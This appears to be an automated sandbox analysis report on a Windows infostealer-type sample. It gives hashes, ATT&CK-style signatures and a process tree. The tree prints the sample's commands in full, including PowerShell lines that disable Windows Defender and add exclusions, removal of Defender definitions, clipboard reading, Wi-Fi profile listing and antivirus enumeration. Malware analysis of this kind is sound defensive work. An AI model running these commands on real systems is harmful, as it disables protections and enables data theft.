Analysis
-
max time kernel
104s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20250410-en -
resource tags
arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system -
submitted
14/04/2025, 08:50
Behavioral task
behavioral1
Sample
2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe
Resource
win10v2004-20250410-en
General
-
Target
2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe
-
Size
15.9MB
-
MD5
140c7fd0266d255f7d1d9f093ef524cb
-
SHA1
ca395df443ff6fb64a4faa38258d36f6e4238c2a
-
SHA256
4cbdb224246911d43eca0b8abd6d8e77715670b8db32766d3161e61f1c041e21
-
SHA512
0c1387b0f409b0dae3e8db83bd689dd3c8eeb707ad8f5eb48499ced75006226a5d069abe8793dee05ec747a7f46101259ae1cca20f766cfc528ed70fa600b2a9
-
SSDEEP
393216:sx8UMO6wNto3KDGoZYJv+KDt85w8wIKppDO9iq:KrFEKDGPgWIKpp+iq
Malware Config
Signatures
-
pid Process 1804 powershell.exe 3356 powershell.exe 5512 powershell.exe 2288 powershell.exe 1452 powershell.exe 4348 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5520 cmd.exe 1640 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3636 bound.exe 1644 bound.exe 5668 rar.exe -
Loads dropped DLL 38 IoCs
pid Process 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe 1644 bound.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 5656 tasklist.exe 1868 tasklist.exe 5320 tasklist.exe 5580 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2312 cmd.exe -
resource yara_rule behavioral1/files/0x000a0000000240b6-22.dat upx behavioral1/memory/2572-26-0x00007FFD18830000-0x00007FFD18E97000-memory.dmp upx behavioral1/files/0x000a0000000240a8-28.dat upx behavioral1/memory/2572-31-0x00007FFD2FAC0000-0x00007FFD2FAE7000-memory.dmp upx behavioral1/files/0x000a0000000240b4-32.dat upx behavioral1/memory/2572-50-0x00007FFD2FAB0000-0x00007FFD2FABF000-memory.dmp upx behavioral1/files/0x000a0000000240af-49.dat upx behavioral1/files/0x000a0000000240ae-48.dat upx behavioral1/files/0x000a0000000240ad-47.dat upx behavioral1/files/0x000a0000000240ac-46.dat upx behavioral1/files/0x000a0000000240ab-45.dat upx behavioral1/files/0x000a0000000240aa-44.dat upx behavioral1/files/0x000a0000000240a9-43.dat upx behavioral1/files/0x000a0000000240a7-42.dat upx behavioral1/files/0x000a0000000240bb-41.dat upx behavioral1/files/0x000a0000000240ba-40.dat upx behavioral1/files/0x000a0000000240b9-39.dat upx behavioral1/memory/2572-54-0x00007FFD2BC70000-0x00007FFD2BC9B000-memory.dmp upx behavioral1/memory/2572-52-0x00007FFD2BCA0000-0x00007FFD2BCBA000-memory.dmp upx behavioral1/files/0x000a0000000240b5-36.dat upx behavioral1/files/0x000a0000000240b3-35.dat upx behavioral1/memory/2572-60-0x00007FFD2BB20000-0x00007FFD2BB45000-memory.dmp upx behavioral1/memory/2572-62-0x00007FFD18500000-0x00007FFD18689000-memory.dmp upx behavioral1/memory/2572-66-0x00007FFD2BB80000-0x00007FFD2BB8D000-memory.dmp upx behavioral1/memory/2572-65-0x00007FFD28F80000-0x00007FFD28F99000-memory.dmp upx behavioral1/memory/2572-69-0x00007FFD28900000-0x00007FFD28933000-memory.dmp upx behavioral1/memory/2572-73-0x00007FFD28830000-0x00007FFD288FE000-memory.dmp upx behavioral1/memory/2572-72-0x00007FFD18830000-0x00007FFD18E97000-memory.dmp upx behavioral1/memory/2572-76-0x00007FFD2FAC0000-0x00007FFD2FAE7000-memory.dmp upx behavioral1/memory/2572-80-0x00007FFD28F50000-0x00007FFD28F5D000-memory.dmp upx behavioral1/memory/2572-79-0x00007FFD28F60000-0x00007FFD28F74000-memory.dmp upx behavioral1/memory/2572-75-0x00007FFD17BC0000-0x00007FFD180F3000-memory.dmp upx behavioral1/memory/2572-83-0x00007FFD2BC70000-0x00007FFD2BC9B000-memory.dmp upx behavioral1/memory/2572-84-0x00007FFD28570000-0x00007FFD28623000-memory.dmp upx behavioral1/memory/2572-86-0x00007FFD18500000-0x00007FFD18689000-memory.dmp upx behavioral1/memory/2572-85-0x00007FFD2BB20000-0x00007FFD2BB45000-memory.dmp upx behavioral1/memory/2572-188-0x00007FFD28900000-0x00007FFD28933000-memory.dmp upx behavioral1/memory/2572-276-0x00007FFD28830000-0x00007FFD288FE000-memory.dmp upx behavioral1/memory/2572-344-0x00007FFD17BC0000-0x00007FFD180F3000-memory.dmp upx behavioral1/memory/2572-358-0x00007FFD18830000-0x00007FFD18E97000-memory.dmp upx behavioral1/memory/2572-372-0x00007FFD28570000-0x00007FFD28623000-memory.dmp upx behavioral1/memory/2572-364-0x00007FFD18500000-0x00007FFD18689000-memory.dmp upx behavioral1/memory/2572-408-0x00007FFD28570000-0x00007FFD28623000-memory.dmp upx behavioral1/memory/2572-394-0x00007FFD18830000-0x00007FFD18E97000-memory.dmp upx behavioral1/memory/2572-419-0x00007FFD18500000-0x00007FFD18689000-memory.dmp upx behavioral1/memory/2572-418-0x00007FFD28900000-0x00007FFD28933000-memory.dmp upx behavioral1/memory/2572-417-0x00007FFD28F80000-0x00007FFD28F99000-memory.dmp upx behavioral1/memory/2572-416-0x00007FFD2BB80000-0x00007FFD2BB8D000-memory.dmp upx behavioral1/memory/2572-415-0x00007FFD28830000-0x00007FFD288FE000-memory.dmp upx behavioral1/memory/2572-414-0x00007FFD2BB20000-0x00007FFD2BB45000-memory.dmp upx behavioral1/memory/2572-413-0x00007FFD2BC70000-0x00007FFD2BC9B000-memory.dmp upx behavioral1/memory/2572-412-0x00007FFD2BCA0000-0x00007FFD2BCBA000-memory.dmp upx behavioral1/memory/2572-411-0x00007FFD2FAB0000-0x00007FFD2FABF000-memory.dmp upx behavioral1/memory/2572-410-0x00007FFD2FAC0000-0x00007FFD2FAE7000-memory.dmp upx behavioral1/memory/2572-409-0x00007FFD17BC0000-0x00007FFD180F3000-memory.dmp upx behavioral1/memory/2572-407-0x00007FFD28F50000-0x00007FFD28F5D000-memory.dmp upx behavioral1/memory/2572-406-0x00007FFD28F60000-0x00007FFD28F74000-memory.dmp upx -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x00320000000240a4-101.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5160 cmd.exe 2208 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3356 cmd.exe 5936 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1444 WMIC.exe 2192 WMIC.exe 5340 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2356 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2208 PING.EXE -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 5512 powershell.exe 5512 powershell.exe 4348 powershell.exe 4348 powershell.exe 1452 powershell.exe 1452 powershell.exe 5512 powershell.exe 1452 powershell.exe 4348 powershell.exe 2288 powershell.exe 2288 powershell.exe 2288 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 1804 powershell.exe 1804 powershell.exe 1804 powershell.exe 5164 powershell.exe 5164 powershell.exe 5164 powershell.exe 3356 powershell.exe 3356 powershell.exe 4136 powershell.exe 4136 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5512 powershell.exe Token: SeIncreaseQuotaPrivilege 5032 WMIC.exe Token: SeSecurityPrivilege 5032 WMIC.exe Token: SeTakeOwnershipPrivilege 5032 WMIC.exe Token: SeLoadDriverPrivilege 5032 WMIC.exe Token: SeSystemProfilePrivilege 5032 WMIC.exe Token: SeSystemtimePrivilege 5032 WMIC.exe Token: SeProfSingleProcessPrivilege 5032 WMIC.exe Token: SeIncBasePriorityPrivilege 5032 WMIC.exe Token: SeCreatePagefilePrivilege 5032 WMIC.exe Token: SeBackupPrivilege 5032 WMIC.exe Token: SeRestorePrivilege 5032 WMIC.exe Token: SeShutdownPrivilege 5032 WMIC.exe Token: SeDebugPrivilege 5032 WMIC.exe Token: SeSystemEnvironmentPrivilege 5032 WMIC.exe Token: SeRemoteShutdownPrivilege 5032 WMIC.exe Token: SeUndockPrivilege 5032 WMIC.exe Token: SeManageVolumePrivilege 5032 WMIC.exe Token: 33 5032 WMIC.exe Token: 34 5032 WMIC.exe Token: 35 5032 WMIC.exe Token: 36 5032 WMIC.exe Token: SeDebugPrivilege 5656 tasklist.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeIncreaseQuotaPrivilege 5032 WMIC.exe Token: SeSecurityPrivilege 5032 WMIC.exe Token: SeTakeOwnershipPrivilege 5032 WMIC.exe Token: SeLoadDriverPrivilege 5032 WMIC.exe Token: SeSystemProfilePrivilege 5032 WMIC.exe Token: SeSystemtimePrivilege 5032 WMIC.exe Token: SeProfSingleProcessPrivilege 5032 WMIC.exe Token: SeIncBasePriorityPrivilege 5032 WMIC.exe Token: SeCreatePagefilePrivilege 5032 WMIC.exe Token: SeBackupPrivilege 5032 WMIC.exe Token: SeRestorePrivilege 5032 WMIC.exe Token: SeShutdownPrivilege 5032 WMIC.exe Token: SeDebugPrivilege 5032 WMIC.exe Token: SeSystemEnvironmentPrivilege 5032 WMIC.exe Token: SeRemoteShutdownPrivilege 5032 WMIC.exe Token: SeUndockPrivilege 5032 WMIC.exe Token: SeManageVolumePrivilege 5032 WMIC.exe Token: 33 5032 WMIC.exe Token: 34 5032 WMIC.exe Token: 35 5032 WMIC.exe Token: 36 5032 WMIC.exe Token: SeDebugPrivilege 1644 bound.exe Token: SeIncreaseQuotaPrivilege 1444 WMIC.exe Token: SeSecurityPrivilege 1444 WMIC.exe Token: SeTakeOwnershipPrivilege 1444 WMIC.exe Token: SeLoadDriverPrivilege 1444 WMIC.exe Token: SeSystemProfilePrivilege 1444 WMIC.exe Token: SeSystemtimePrivilege 1444 WMIC.exe Token: SeProfSingleProcessPrivilege 1444 WMIC.exe Token: SeIncBasePriorityPrivilege 1444 WMIC.exe Token: SeCreatePagefilePrivilege 1444 WMIC.exe Token: SeBackupPrivilege 1444 WMIC.exe Token: SeRestorePrivilege 1444 WMIC.exe Token: SeShutdownPrivilege 1444 WMIC.exe Token: SeDebugPrivilege 1444 WMIC.exe Token: SeSystemEnvironmentPrivilege 1444 WMIC.exe Token: SeRemoteShutdownPrivilege 1444 WMIC.exe Token: SeUndockPrivilege 1444 WMIC.exe Token: SeManageVolumePrivilege 1444 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2108 wrote to memory of 2572 2108 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 85 PID 2108 wrote to memory of 2572 2108 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 85 PID 2572 wrote to memory of 4868 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 90 PID 2572 wrote to memory of 4868 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 90 PID 2572 wrote to memory of 4876 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 91 PID 2572 wrote to memory of 4876 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 91 PID 2572 wrote to memory of 4796 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 94 PID 2572 wrote to memory of 4796 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 94 PID 2572 wrote to memory of 5292 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 95 PID 2572 wrote to memory of 5292 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 95 PID 2572 wrote to memory of 2692 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 98 PID 2572 wrote to memory of 2692 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 98 PID 4876 wrote to memory of 5512 4876 cmd.exe 100 PID 4876 wrote to memory of 5512 4876 cmd.exe 100 PID 2572 wrote to memory of 3584 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 101 PID 2572 wrote to memory of 3584 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 101 PID 3584 wrote to memory of 5032 3584 cmd.exe 103 PID 3584 wrote to memory of 5032 3584 cmd.exe 103 PID 2692 wrote to memory of 5656 2692 cmd.exe 104 PID 2692 wrote to memory of 5656 2692 cmd.exe 104 PID 5292 wrote to memory of 3636 5292 cmd.exe 105 PID 5292 wrote to memory of 3636 5292 cmd.exe 105 PID 4796 wrote to memory of 1452 4796 cmd.exe 106 PID 4796 wrote to memory of 1452 4796 cmd.exe 106 PID 4868 wrote to memory of 4348 4868 cmd.exe 108 PID 4868 wrote to memory of 4348 4868 cmd.exe 108 PID 3636 wrote to memory of 1644 3636 bound.exe 110 PID 3636 wrote to memory of 1644 3636 bound.exe 110 PID 1644 wrote to memory of 6124 1644 bound.exe 163 PID 1644 wrote to memory of 6124 1644 bound.exe 163 PID 2572 wrote to memory of 3288 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 165 PID 2572 wrote to memory of 3288 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 165 PID 3288 wrote to memory of 6008 3288 cmd.exe 114 PID 3288 wrote to memory of 6008 3288 cmd.exe 114 PID 2572 wrote to memory of 4476 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 115 PID 2572 wrote to memory of 4476 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 115 PID 4476 wrote to memory of 3588 4476 cmd.exe 117 PID 4476 wrote to memory of 3588 4476 cmd.exe 117 PID 2572 wrote to memory of 1296 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 118 PID 2572 wrote to memory of 1296 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 118 PID 1296 wrote to memory of 1444 1296 cmd.exe 120 PID 1296 wrote to memory of 1444 1296 cmd.exe 120 PID 2572 wrote to memory of 1860 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 121 PID 2572 wrote to memory of 1860 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 121 PID 1860 wrote to memory of 2192 1860 cmd.exe 123 PID 1860 wrote to memory of 2192 1860 cmd.exe 123 PID 2572 wrote to memory of 2312 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 124 PID 2572 wrote to memory of 2312 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 124 PID 2572 wrote to memory of 3856 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 125 PID 2572 wrote to memory of 3856 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 125 PID 2312 wrote to memory of 5804 2312 cmd.exe 128 PID 2312 wrote to memory of 5804 2312 cmd.exe 128 PID 3856 wrote to memory of 2288 3856 cmd.exe 129 PID 3856 wrote to memory of 2288 3856 cmd.exe 129 PID 2572 wrote to memory of 704 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 130 PID 2572 wrote to memory of 704 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 130 PID 2572 wrote to memory of 4088 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 131 PID 2572 wrote to memory of 4088 2572 2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe 131 PID 1644 wrote to memory of 728 1644 bound.exe 134 PID 1644 wrote to memory of 728 1644 bound.exe 134 PID 4088 wrote to memory of 1868 4088 cmd.exe 135 PID 4088 wrote to memory of 1868 4088 cmd.exe 135 PID 704 wrote to memory of 5320 704 cmd.exe 136 PID 704 wrote to memory of 5320 704 cmd.exe 136 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5804 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5292 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c title Casa Cloner - Developed by Noritem#66666⤵PID:6124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:4940
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\2025-04-14_140c7fd0266d255f7d1d9f093ef524cb_black-basta_cobalt-strike_satacom.exe"4⤵
- Views/modifies file attributes
PID:5804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:6048
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5308
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3968
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3356 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5936
-
-
